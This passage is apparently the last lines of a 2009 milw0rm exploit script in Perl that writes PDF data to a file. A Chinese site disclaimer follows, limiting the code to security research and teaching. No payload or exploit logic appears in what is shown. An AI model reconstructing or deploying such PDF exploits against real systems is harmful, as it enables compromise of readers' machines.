$pdf_data2;

# close's return value is also unchecked.
close $pdf;
# milw0rm.com [2009-03-11]
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。